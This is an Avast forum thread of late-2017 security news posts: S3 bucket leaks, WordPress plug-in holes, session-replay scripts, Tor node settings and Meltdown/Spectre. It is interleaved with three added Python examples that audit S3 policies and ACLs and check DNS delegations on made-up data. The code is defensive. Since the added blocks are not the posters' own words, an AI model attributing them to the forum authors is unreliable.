Very interesting, but I do find the response by many companies "Vendor does not publicly document their requirement for SMB1." That is pretty poor and almost an admission that they do use it, this certainly doesn't help the user protect their system.
I would be seriously looking to get rid of any program that doesn't comment on their use of SMBv1, if they do, then their users systems could be at risk. If they don't use it (or use a later version of SMBv?) then their users aren't at risk, but should still disable SMBv1.
I'm happy to report that disabling SMB1 has not affected my new Epson ET-2650 (https://epson.com/For-Home/Printers/Inkjet/Epson-Expression-ET-2650-EcoTank-All-in-One-Printer/p/C11CF47201) printer. :)
-
Another vulnerable WordPress plug-in reported by Sucuri:
https://blog.sucuri.net/2017/11/sql-injection-bbpress.html
Check WordPress here: https://hackertarget.com/wordpress-security-scan/
and via domxssscanner.com/scan
polonus (volunteer website security analyst and website error-hunter)
-
White House announces their new zero-day announcement policy.
What to announce and publish, what to patch and what to keep secret to use by government services,
hopefully unknown to other parties.
https://www.whitehouse.gov/blog/2017/11/15/improving-and-making-vulnerability-equities-process-transparent-right-thing-do
Mind that zero-day info proliferation is always bad and especially
when eventually all knowledge will land in the hands of opponents or criminals (cyberthreats).
No zero-days and full transparency and a full secure and safe infrastructure should be the ideal we are after,
but that is outside a real world situation and does not suit common big government's AI surveillance demands.
polonus
-
@ Damien,
https://forum.avast.com/index.php?topic=66267.msg1431062#msg1431062
Better late than never. :)
-
Agree with you there, bob3160, a form of wising up.
Damian
-
Tor browser, scripts and compromise of nodes.
When using tor-browser for legit purposes, you do not want your entry nodes compromised.
What to do when all your entry nodes are exclusively US or UK nodes for instance?
Well you could set these settings in your config
StrictNodes 1
ExcludeNodes {US}
Quote info credits go to: alexey vesnin
Those that do not read-in sufficiently on protocols and settings and the inner workings of a tool
will be a danger to themselves and others on tor.
Lack of proper knowledge is an endangering negligence.
That is one of the reasons why a lot of dumb criminals do not find a legit job,
as they will get caught for not paying attention.
Tor developers learned from Operation Onymous for instance
where the basic protection of tor was being compromised,
when ten exit nodes were being taken down at once,
and in Miami and Amsterdam three servers were confiscated.
Tor developers like to understand how to better protect through entry guards.
Not that they wanna frustrate taking down illegal or criminal servers,
but they wanna protect against compromise through dictatorial regimes against journalists
who seek to protect their privacy through the use of tools like Tails and Tor.
Always true however: "Do not do the crime, if you cannot do the time!".
Stay away from tor whenever you can avoid it
and do not share with the Internet what you do not wanna share with others.
polonus
-
Pentagon leaks data through Amazon S3 buckets
Read: https://www.upguard.com/breaches/cloud-leak-centcom
Despite the fact that Amazon introduced new warning-for-leakage measures:
https://aws.amazon.com/blogs/aws/new-amazon-s3-encryption-security-features/
Good to read further here: https://blog.detectify.com/2017/07/13/aws-s3-misconfiguration-explained-fix/
A misconfiguration in the cloud, could leave you with a lot of data-breach misery.
The six vulnerability schemes that were there (hopefully not any longer):
Amazon S3 bucket allows for full anonymous access
Amazon S3 bucket allows for arbitrary file listing
Amazon S3 bucket allows for arbitrary file upload and exposure
Amazon S3 bucket allows for blind uploads
Amazon S3 bucket allows arbitrary read/writes of objects
Amazon S3 bucket reveals ACP/ACL
"Yes, baby, it is a wild world on that infrastructure :o ".
Amazon getting too big to fail will mean an advanced security risk.
More of a mono-culture will always mean more attack surface,
and that means increased targeted attacks and threats.
polonus
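The six exposure schemes listed above all reduce to one reviewable property of a bucket policy: an Allow statement that hands an S3 action to everyone (Principal "*"). The following is an added example, not code from the post, from UpGuard, from Detectify or from AWS, that audits a policy document offline for exactly that. The bucket name, account id and role name in the constructed sample policies are placeholders; the script needs no AWS credentials because it only reads the JSON a policy review would paste in.

```python
"""Audit an S3 bucket policy document for anonymous grants.

Added example with constructed policies; not code from the forum post or
from AWS. Maps the listed misconfiguration schemes to the IAM actions that
cause them and flags any Allow statement granting one to Principal "*".
"""
import fnmatch
import json
from typing import Dict, List

# Anonymous-allowed action -> which of the listed exposures it produces.
EXPOSURE_BY_ACTION = {
    "s3:ListBucket": "arbitrary file listing",
    "s3:GetObject": "anonymous read (full anonymous access with listing)",
    "s3:PutObject": "arbitrary file upload (blind upload if listing is denied)",
    "s3:DeleteObject": "arbitrary write/delete of objects",
    "s3:GetBucketAcl": "reveals the bucket ACP/ACL",
    "s3:PutBucketAcl": "lets anyone rewrite the ACL",
}


def _as_list(value) -> List:
    """The policy grammar allows a string or a list in most positions."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal) -> bool:
    """Principal "*" or {"AWS": "*"} means anyone, unauthenticated included."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def find_public_grants(policy: Dict) -> List[Dict[str, str]]:
    """One finding per (statement, dangerous action) granted to everyone.

    Deny statements are skipped: they never widen access. A statement with
    a Condition (e.g. aws:SourceIp) is still reported but tagged, because a
    reviewer should judge whether the condition really narrows it.
    """
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        granted = [g.lower() for g in _as_list(stmt.get("Action"))]
        for action, exposure in EXPOSURE_BY_ACTION.items():
            # IAM action names are case-insensitive and "s3:*" / "s3:Put*"
            # are glob patterns over them.
            if any(fnmatch.fnmatchcase(action.lower(), g) for g in granted):
                findings.append({
                    "statement": stmt.get("Sid", f"#{idx}"),
                    "action": action,
                    "exposure": exposure,
                    "conditional": "yes" if stmt.get("Condition") else "no",
                })
    return findings


# Constructed sample: the leaky policy and the hardened one that replaces it.
LEAKY_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]},
    {"Sid": "AnyoneCanUpload", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:Put*", "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}
""")

HARDENED_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "AppRoleOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-role"},
     "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
     "Action": "s3:*",
     "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"],
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}}
  ]
}
""")

if __name__ == "__main__":
    for f in find_public_grants(LEAKY_POLICY):
        print(f"{f['statement']}: {f['action']} -> {f['exposure']} (conditional: {f['conditional']})")
    print("hardened findings:", find_public_grants(HARDENED_POLICY))
```

Note that "s3:Put*" in the leaky sample silently grants s3:PutBucketAcl as well as uploads, which is how a bucket meant for drop-box uploads ends up with a rewritable ACL; the hardened version names a single role and uses the wildcard principal only in a Deny.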
-
I don't know where to post this,
so this is as good as any place.
The new Avast is deleting files that worked well for years and doesn't let me recover or exempt them from the deletion.
If there is a way to fix it, plz inform; otherwise I am on the hunt for another antivirus :(
-
I don't know where to post this,
so this is as good as any place.
The new Avast is deleting files that worked well for years and doesn't let me recover or exempt them from the deletion.
If there is a way to fix it, plz inform; otherwise I am on the hunt for another antivirus :(
In your own new topic in the following forum:
https://forum.avast.com/index.php?board=4.0
Describing when these files got deleted would help.
A screenshot would also be of help.
Are those files now in the virus chest???
-
I don't know where to post this,
so this is as good as any place.
The new Avast is deleting files that worked well for years and doesn't let me recover or exempt them from the deletion.
If there is a way to fix it, plz inform; otherwise I am on the hunt for another antivirus :(
This topic and sub-forum are unrelated to your problem; use the Viruses & Worms (https://forum.avast.com/index.php?board=4.0) sub-forum.
This is where you report a suspected false positive. At the top of these forums is a New Topic button to start your own new topic.
You will need to give more information on the 'file name', 'location' and 'malware name' given in the detections.
-
Hundreds of very popular top sites will send all your keystrokes, mouse movements, scroll behaviour and content of visited pages to 3rd parties via so-called replay scripts, and this without your consent or you even knowing. It almost resembles someone shoulder-surfing you all of the time. :o
Very personal private data you share with the Internet like your private medical data, your credit card data and/or other personal private data could literally all have flown 'out of the window' by now.
Read: https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/
Most adblock scripts do not cover (all of) such replay-scripts.
Launchers thereof also do not honor the DoNotTrack setting in browsers.
Big websites do not respect their end-users' integrity.
I hope this will come to bite them in the end and they will pay with popularity.
Time for NoScript, uMatrix or a key scrambler now?
polonus
-
This is the list of shame:
https://webtransparency.cs.princeton.edu/no_boundaries/session_replay_sites.html
We should not be running such scripts in clients.
Whatever they wanna do with code on their servers is their thing,
but keep it out of my browser please.
polonus
-
Vulnerability Note VU#817544
Windows 8 and later fail to properly randomize every application if system-wide mandatory ASLR is enabled via EMET or Windows Defender Exploit Guard
https://www.kb.cert.org/vuls/id/817544
-
Eye-for-an-eye hacking is already ongoing: https://www.thedailybeast.com/inside-the-shadowy-world-of-revenge-hackers
Corporations do not propagate this officially, of course, but now these German cyber-ops wanna start hacking back:
https://www.zitis.bund.de/DE/Home/home_node.html
Read: http://www.spiegel.de/netzwelt/netzpolitik/cyberwar-zitis-praesident-wilfried-karl-will-digitalen-gegenschlag-a-1179729.html
Translate from German using Google Translate please.
pol
-
2016 Data Security Incident
https://www.uber.com/newsroom/2016-data-incident
-
WordPress websites attacked through holes in two popular plug-ins:
https://blog.sucuri.net/2017/11/formidable-forms-shortcodes-ultimate-exploits-in-the-wild.html
Check the security of a WordPress website domain here: https://hackertarget.com/wordpress-security-scan/
Also check for retirable jQuery code: retire.insecurity.today/#
and check here: https://aw-snap.info/file-viewer/
Keep your website CMS up to date and fully patched also to keep others more secure!
polonus (volunteer website security analyst and website error-hunter)
-
https://blog.imgur.com/2017/11/24/notice-of-data-breach/
imgur, a popular image hosting site has been hacked.
"On the morning of November 24th, we began notifying impacted users via their registered email address. We are immediately requiring that these users update their password." imgur
-
Hidden trackers in popular Android-apps: Read: https://privacylab.yale.edu/press
A solution outside of the Google webshop (because it is not allowed there,
because it interferes with the Google business model of data-slurping,
profiling and tracking all of your data
= blokada - Blokada is a free, open source, compact,
fast ad blocker for Android that works for all apps and does not require root.
-> https://github.com/blokadaorg/blokada
Best browser on android i.m.o. = Brave together with Disconnect me.
polonus (volunteer website security analyst and website error-hunter)
-
Considerable increase in the number of SQL attacks on web applications found:
https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q3-2017-state-of-the-internet-security-report.pdf
polonus
-
If you have a Mac, you have a Security problem.
Here's how to fix it until Apple comes up with a patch.
https://www.howtogeek.com/334611/huge-macos-bug-allows-root-login-without-a-password.-heres-the-fix/
-
Cryptominer goes on mining after you closed the browser window through a pop-under:
https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/
polonus
-
Cryptominer goes on mining after you closed the browser window through a pop-under:
https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/
polonus
(http://screencast-o-matic.com/screenshots/u/Lh/1512048226929-24769.png)
Have you tried No Coin ???
https://docs.google.com/document/d/1t-KnUTbvVcFnB0l2h0ftDdGuKQmbeF4uMur4-rl3c8o/edit?usp=sharing
-
New Shadow BTCware Ransomware Variant Released
A new variant of the BTCWare ransomware was discovered by Michael Gillespie, that appends the .[email]-id-id.shadow extension to encrypted files. The BTCWare family of ransomware infections targets its victims by hacking into poorly protected remote desktop services and manually installing the ransomware.
-
WordPress 4.9.1 Security and Maintenance Release
https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
-
New Mirai Attack Attempts Detected in South America and North African Countries
http://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-attack-attempts-detected-south-america-north-african-countries/
https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/new-mirai-variant-found-spreading-like-wildfire
-
forum dot avast dot com site's nameservers configuration security issue:
Stealth name servers Failed Found name servers which are listed by the authoritative servers, but not by the parent ones:
ns6.avast.com at ns2.avast.com
sns.avast.com at ns2.avast.com
sns.avast.com at pns.avast.com
ns6.avast.com at pns.avast.com
Another issue Google Apps settings Warning The top priority mail server is ASPMX.L.GOOGLE.com, but TTL is not equal to the recommended value (86400).
On cert: Supported cipher suites Warning Your server supports suboptimal cipher suites:
DES-CBC3-SHA
Quotes above taken from a public scan at Threat Intelligence Platform for -https://forum.avast.com
polonus (volunteer website security analyst and website error-hunter)
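The "stealth name servers" finding quoted above is a delegation mismatch: the parent zone hands resolvers one NS set, while the zone's own authoritative servers publish a different one. The check below is an added example, not part of the post or of the Threat Intelligence Platform scan it quotes. It works on dig-style answer text and uses constructed, made-up hostnames under example.net so it runs offline; on a live zone the parent view would come from `dig +norecurse @<parent-server> NS <zone>` and each child view from `dig @<authoritative-server> NS <zone>`.

```python
import re

# One dig answer-section line, e.g. "example.net.  172800  IN  NS  ns1.example.net."
_NS_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+NS\s+(\S+)\s*$", re.I)


def parse_ns_answer(text):
    """Return the set of NS hostnames (lower-case, no trailing dot) found in a dig answer."""
    names = set()
    for line in text.splitlines():
        m = _NS_LINE.match(line.strip())
        if m:
            names.add(m.group(3).rstrip(".").lower())
    return names


def delegation_report(parent_ns, child_answers):
    """Compare the parent's delegation with each authoritative server's own NS set.

    child_answers maps the authoritative server that was asked -> its raw dig answer.
    'stealth': listed by that server but not delegated by the parent.
    'missing': delegated by the parent but absent from that server's NS set.
    """
    report = {"stealth": [], "missing": []}
    for asked, text in child_answers.items():
        listed = parse_ns_answer(text)
        report["stealth"] += [(ns, asked) for ns in sorted(listed - parent_ns)]
        report["missing"] += [(ns, asked) for ns in sorted(parent_ns - listed)]
    return report


# Constructed sample data (made-up hostnames, not the forum's real zone).
PARENT_ANSWER = """
example.net.   172800   IN   NS   ns1.example.net.
example.net.   172800   IN   NS   ns2.example.net.
example.net.   172800   IN   NS   ns3.example.net.
"""

CHILD_ANSWERS = {
    "ns2.example.net": """
example.net.   3600   IN   NS   ns1.example.net.
example.net.   3600   IN   NS   ns2.example.net.
example.net.   3600   IN   NS   ns6.example.net.
example.net.   3600   IN   NS   sns.example.net.
""",
    "pns.example.net": """
example.net.   3600   IN   NS   ns1.example.net.
example.net.   3600   IN   NS   ns2.example.net.
example.net.   3600   IN   NS   ns6.example.net.
example.net.   3600   IN   NS   sns.example.net.
example.net.   3600   IN   NS   pns.example.net.
""",
}


def sample_report():
    """Run the comparison over the constructed sample above."""
    return delegation_report(parse_ns_answer(PARENT_ANSWER), CHILD_ANSWERS)


if __name__ == "__main__":
    rep = sample_report()
    for ns, asked in rep["stealth"]:
        print(f"stealth: {ns} is listed by {asked} but not by the parent")
    for ns, asked in rep["missing"]:
        print(f"missing: {ns} is delegated by the parent but not listed by {asked}")
```

A stealth server sits outside the delegation path, so it tends to go unmonitored and unpatched while still receiving the zone; a server the parent lists but the zone does not is a lame delegation waiting to happen, and if that hostname ever lapses it is a takeover target. Either way the fix is the same: make the parent's NS set and the zone's apex NS set identical.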
-
Keylogger activity on thousands of hacked WordPress sites:
https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html
polonus (volunteer website security analyst and website error-hunter)
P.S. Instruction to find the malscript in given Sucuri blog post link : The injected part of this malware didn’t change at all, using the theme’s function.php to enqueue the following scripts to WordPress pages.
Read on the problem of bitcoin mining scripts and how avast will keep us secure:
https://blog.avast.com/avast-blocked-more-than-34-million-monero-cryptomining-attacks
(blog post credits: avast's Denis Konopisky)
D
-
Just to give an idea what script was being abused to inject reconnecting-websocket.js -> https://www.reverse.it/sample/23118b9873d0ba566f606dcaa27f5c078b2c2f6259e8470ffa71875119897b5d?environmentId=100
Also the way Brute Force is being used here via Bluto abuse: https://gr.pinterest.com/pin/328410997819076735/
pol
-
Spyware inside printer software (weakly protected as usual)
is the royal way into your firm network for spies and sp**ks:
Re: https://zwclose.github.io/HP-keylogger/
When they are in your printer they are inside your network.
With all the spyware added lately to all kind of hardware,
it seems consumer rights are being violated on a grand scale everywhere,
and nobody seems to take your consumer rights seriously.
polonus
-
Do not get it wrong. 25% of PHISHING websites now offer secure connections.
These certified websites (Comodo or Let's Encrypt certification) have a green padlock,
so Mr. and Mrs. Average End-user will think such websites are safe. They are not!
They only have a secure connection to.... unsafety!
Read: https://info.phishlabs.com/blog/quarter-phishing-attacks-hosted-https-domains
polonus
-
This implies that with avast we will have to untick "no scanning of trusted websites",
but have all websites scanned, marked as trusted and not trusted alike.
Because in this case it could be a trusted phishing site (a contradictio in terminis),
that we tagged not to be scanned by avast. Capito? Always set to scan all sites!
polonus
-
Here is how to have avast scan all websites. See attached below.
As 'Do not scan trusted websites' is already checked off by default, so in order to have avast scan all websites, including trusted ones, this box must be cleared off and the check removed.
Should be noted that a clean install will always restore this setting to not scan trusted websites so it is one of the things that must be checked on a new install of avast if you do not wish this behavior.
-
This should make it very easy for even a novice to follow
(http://screencast-o-matic.com/screenshots/u/Lh/1512923654669-33537.png)
-
Thank you, bob3160, for keeping everybody secure with this message,
together with your very clear picture and additional arrows,
that go the right direction. ;D ;)
Hope everybody stays safe that way.
Damian
-
CONFICKER / DOWNAD / DOWNADUP 9 Years After
http://blog.trendmicro.com/trendlabs-security-intelligence/conficker-downad-9-years-examining-impact-legacy-systems/
CVE-2008-4250 dominates our detections for vulnerabilities, with over 60,000 for the month of October 2017 alone.
All these clues paint a picture of the typical DOWNAD victim: organizations in key industries, typically from developing countries, that use outdated, unpatched legacy systems as an integral part of their network.
Conficker > https://en.wikipedia.org/wiki/Conficker
Until recently two versions of Conficker were still in F-Secure's top 10 detections every 24h.
VirusMap > http://worldmap3.f-secure.com/
-
Hi Pondus,
According to Trend Micro, Conficker can be characterized as "background-malware", specially being active on legacy systems.
"Not quite as interesting to a larger audience as modern malware like WannaCry & Petya, it still is a persistent threat and will be so as long as no longer supported, unpatched legacy systems form part of corporate networks".
polonus
-
Problem with bogus EV SSL-certificates has been demonstrated by researcher:
Read: https://twitter.com/iangcarroll/status/940281927789146112
It cost the researcher under half an hour and 177 dollars to spoof the real extended validation certificate.
Is this a danger? And how it is!
More and more it is shown that certification online has the same problems
as all of the rest of the infrastructure; it is pn*wed and holed from all sides around
to serve black hats and other sp**ks from your own government together with cybercriminals of all sorts.
If they wanna target you in person, you are birdfeed in no time,
and all the time the going gets narrower. ;D ::) >:(
polonus
-
“Suspicious” event routes traffic for big-name sites through Russia
https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia/
-
(http://screencast-o-matic.com/screenshots/u/Lh/1513282432173-62724.png)
-
Hi bob3160,
Not good for your US consumers, not good for your US businesses.
Opens up a box of Pandora of mischief, that will go on unnoticed until found out years later.
Those that start to throttle will be out of business sooner or later, that is predictable.
I wish you all good luck with it.
"When you in the States are feeling the rain, in Europe it starts to drip. ;D".
Damian
-
Other holed themes, Newspaper and Newsmag, to infest WordPress CMS sites through:
https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html
pol
-
NSA more than likely compromised encryption for surveillance targeting:
Read how hard it is to detect mathematical backdoors and much easier to inject these into export standards:
https://www.theregister.co.uk/2017/12/15/crypto_mathematical_backdoors/
This may come as shocking news for many after the "controlled" revelations by Snowden and Assange.
Read: https://www.theregister.co.uk/2013/09/23/rsa_crypto_warning/
and is blockchain as security chain coming to the rescue:
https://www.packtpub.com/big-data-and-business-intelligence/mastering-blockchain
The infrastructure is broken, trust is a thing of the past, we have landed in the middle of an insecure Interwebs swamp,
somehow.
Big Guv Surveillance sp**ks, we thank you for doing that to the global Internet community over the years.
We owe you, we really do ::)
polonus
-
Firefox Prepares to Mark All HTTP Sites "Not Secure" After HTTPS Adoption Rises
https://www.bleepingcomputer.com/news/software/firefox-prepares-to-mark-all-http-sites-not-secure-after-https-adoption-rises/
-
Also see - https://forum.avast.com/index.php?topic=210852.msg1436360#msg1436360, why bother with just http as https isn't guaranteed safe.
-
Hi DavidR & ehmen,
The reason for the https everywhere campaign by google and also now firefox could be that loads and loads of folks have insecure wifi access points to go onto connections out, and in that way could have a HTTP-drive-by-download injection launched against them quite easily. Read background: https://www.theguardian.com/technology/2017/oct/16/wpa2-wifi-security-vulnerable-hacking-us-government-warns
But do not take it for granted you are safe for big guv surveillance on https: ""There's now a thriving outsourced surveillance industry and they are there to meet the needs and wants of countries from around the world, including those who are more – and less – respectful to human rights."
polonus
-
Then be ready for sites that, whilst using https, also get stung (insecure) if not all of their content is https, the avast forums for instance. Some images come from http links, whilst this shouldn't be an issue for attached images as these are held within the forums' https content.
So you could end up with one page being just fine and another getting pinged as insecure, this is likely to confuse users.
-
Hi DavidR,
The green padlock story, also is confusing to Joe and Jill Common from the average user base.
As long as there is mixed content while phasing out http,
and that is apparently what the big players want,
this will create a lot of confusion during the process.
If you want to change all that, do a good job of it and not half-heartedly,
like with all things on the Interwebs has been the case frequently.
Https and secure log-in and security headers implemented, no vulnerable nameservers anymore,
no more hosters that are in for the cheap money and less for security.
We have been in a patching full time circle from the start,
and what has this brought us from the turn of the century?
An infrastructure that looks more like a bandaged stuffed mummy full of plasters...
polonus
-
That's the problem, the end user can do nothing about these issues, they just get the 'insecurity' flag flash up and worry there is something seriously wrong.
Whilst you can expand the information, it isn't detailed enough for the average user, when the language used is 'For instances images.'
-
Another big scale brute force attack on WordPress sites going on.
In the past never that much of a success, but we still wanna warn against it:
https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack/
pol
-
That's the problem, the end user can do nothing about these issues, they just get the 'insecurity' flag flash up and worry there is something seriously wrong.
Whilst you can expand the information, it isn't detailed enough for the average user, when the language used is 'For instances images.'
I just approached Screencast-O-Matic since the screenshots are uploaded to an http site. My question was about changing to a secure server so that the pictures don't wind up being tagged as insecure.
-
That's the problem, the end user can do nothing about these issues, they just get the 'insecurity' flag flash up and worry there is something seriously wrong.
Whilst you can expand the information, it isn't detailed enough for the average user, when the language used is 'For instances images.'
I just approached Screencast-O-Matic since the screenshots are uploaded to an http site. My question was about changing to a secure server so that the pictures don't wind up being tagged as insecure.
I just received a reply:
Hello,
When you navigate to an uploaded screenshot link, it should redirect to https. We'll update the Recorder soon so that the link created in the clipboard is https as well.
-Sam
It certainly didn't take long. :)
-
300.000 WordPress sites vulnerable through holed Captcha plug-in:
https://www.wordfence.com/blog/2017/12/backdoor-captcha-plugin/
polonus
-
The involved botnet in these brute force attacks tries to install a cryptominer onto WordPress servers:
https://www.wordfence.com/blog/2017/12/massive-cryptomining-campaign-wordpress/
"Bitcoin the only coin without any social function"
polonus (volunteer website security analyst and website error-hunter)
-
Another 123 million American user data-breach from an Amazon S3 bucket.
Re: https://www.upguard.com/breaches/cloud-leak-alteryx
S3 buckets should be secure unless you configure them improperly.
It was not publicly available, but creating an AWS account to get access to a misconfigured Amazon S3 bucket was easy-peasy
and made this big data-breach possible. The data are solid gold for identity thieves, spammers and black hat marketeers alike.
polonus
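The "not public, but any AWS account can read it" situation in the post above comes from an ACL grant to the S3 group AuthenticatedUsers, which means every AWS customer in the world, not just your own accounts. The audit below is an added example, not from the post or the UpGuard write-up. The two group URIs are the real values S3 uses; the bucket names, ACL documents and bucket policies are constructed sample data so the check runs offline. On a live account the same dictionaries come back from `boto3.client("s3").get_bucket_acl(Bucket=...)` and `get_bucket_policy(Bucket=...)["Policy"]`.

```python
import json

# The two canned S3 grantee groups that make a bucket world- or AWS-wide readable.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the Internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account holder, not just yours",
}


def audit_bucket_acl(bucket, acl):
    """Flag ACL grants to AllUsers / AuthenticatedUsers (shape of boto3 get_bucket_acl())."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GRANTEES:
            findings.append({"bucket": bucket, "source": "acl",
                             "permission": grant.get("Permission"),
                             "who": PUBLIC_GRANTEES[uri], "conditional": False})
    return findings


def _principal_is_wildcard(principal):
    """True for Principal "*" or {"AWS": "*"} / {"AWS": [..., "*"]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False


def audit_bucket_policy(bucket, policy_json):
    """Flag Allow statements whose Principal is a wildcard; a Condition does not make it
    safe automatically, so those are reported as 'conditional' for manual review."""
    findings = []
    stmts = json.loads(policy_json).get("Statement", [])
    for stmt in ([stmts] if isinstance(stmts, dict) else stmts):
        if stmt.get("Effect") == "Allow" and _principal_is_wildcard(stmt.get("Principal")):
            actions = stmt.get("Action", [])
            findings.append({"bucket": bucket, "source": "policy",
                             "permission": actions if isinstance(actions, str) else ", ".join(actions),
                             "who": "anyone on the Internet",
                             "conditional": bool(stmt.get("Condition"))})
    return findings


def audit_bucket(bucket, acl, policy_json=None):
    findings = audit_bucket_acl(bucket, acl)
    if policy_json:
        findings += audit_bucket_policy(bucket, policy_json)
    return findings


# Constructed sample data (made-up bucket names and IDs).
OWNER = {"Type": "CanonicalUser", "ID": "0123456789abcdef0123456789abcdef"}
LEAKY_ACL = {"Owner": {"ID": OWNER["ID"]}, "Grants": [
    {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
     "Permission": "READ"},
]}
PRIVATE_ACL = {"Owner": {"ID": OWNER["ID"]}, "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
OPEN_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::analytics-export/*"}]})
SCOPED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/etl-reader"},
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::customer-archive/*"}]})

if __name__ == "__main__":
    for f in audit_bucket("analytics-export", LEAKY_ACL, OPEN_POLICY):
        print(f"{f['bucket']}: {f['source']} grants {f['permission']} to {f['who']}")
    print("customer-archive:", audit_bucket("customer-archive", PRIVATE_ACL, SCOPED_POLICY) or "no findings")
```

Object-level ACLs can open individual keys even when the bucket ACL is clean, so the same grantee check belongs on `get_object_acl()` results too; S3 Block Public Access on the account is the setting that makes both grants impossible to re-introduce by accident.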
-
Rolling out Ubuntu 17.10 was halted, because it was corrupting the Lenovo computer bios.
Read: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1734147
Someone created a non-tested bug in a production release.
All ubuntu flaws, also mint, privacy technically have leaks & backdoors.
Related info on that bug:
https://www.howtogeek.com/226308/the-windows-platform-binary-table-why-crapware-can-come-back-after-a-clean-install/
polonus (volunteer website security analyst and website error-hunter)
-
Backdoor in three WordPress plug-ins detected:
https://www.wordfence.com/blog/2017/12/plugin-backdoor-supply-chain/
polonus
-
Starbucks Wi-Fi Turned People’s Laptops into Cryptocurrency Miners
http://news.softpedia.com/news/starbucks-wi-fi-turned-people-s-laptops-into-cryptocurrency-miners-518997.shtml
-
New but nothing new ;)
Another FaceBook virus >> http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/
-
The Need for Better Built-in Security in IoT Devices
http://blog.trendmicro.com/trendlabs-security-intelligence/iot-devices-need-better-builtin-security/
The Sound of a Targeted Attack
pdf.doc >> https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-Attack.pdf
-
Chrome extension gave 105.000 users a crypto-miner:
https://productforums.google.com/forum/#!topic/chrome/b0JUzg4HYtI
Crypto mining a growing problem next to ad-launching and spamming.
The extension is still there ::)
polonus
-
Magento breach through helpdesk software:
http://gwillem.gitlab.io/2017/12/28/hackers-breach-magento-through-helpdesk/
pol
-
Your leaking privacy on Google etc. is long gone out of the window...
will they ever do something about this or won't they even bother to consider it?
Read: https://www.theregister.co.uk/2017/10/10/leakybydesign_location_services_show_outsourced_security_wont_ever_work/
polonus
-
Personally never believed in security of browser password managers,
now webtrackers abuse them to track you all over the Interwebs. ::)
Read: https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
To solve this in firefox (old) - FF/PaleMoon users: 'about:config' > 'signon.autofillForms' > 'FALSE' [SOLVED]
polonus (volunteer website security analyst and website error-hunter)
-
A Huge Intel Security Hole Could Slow Down Your PC Soon
https://www.howtogeek.com/338269/a-huge-intel-security-hole-could-slow-down-your-pc-soon/
OS Makers Preparing Patches for Secret Intel CPU Security Bug
https://www.bleepingcomputer.com/news/security/os-makers-preparing-patches-for-secret-intel-cpu-security-bug/
Intel Denies Reports of Huge Performance Dip Due to Patches for CPU Security Bug
https://www.bleepingcomputer.com/news/hardware/intel-denies-reports-of-huge-performance-dip-due-to-patches-for-cpu-security-bug/
-
Protect yourself:
How to Check and Update Windows Systems for the Meltdown and Spectre CPU Flaws
https://www.bleepingcomputer.com/news/microsoft/how-to-check-and-update-windows-systems-for-the-meltdown-and-spectre-cpu-flaws/
List of Meltdown and Spectre Vulnerability Advisories, Patches, & Updates
https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/
Google: Almost All CPUs Since 1995 Vulnerable To "Meltdown" And "Spectre" Flaws
https://www.bleepingcomputer.com/news/security/google-almost-all-cpus-since-1995-vulnerable-to-meltdown-and-spectre-flaws/
Mozilla Confirms Web-Based Execution Vector for Meltdown and Spectre Attacks
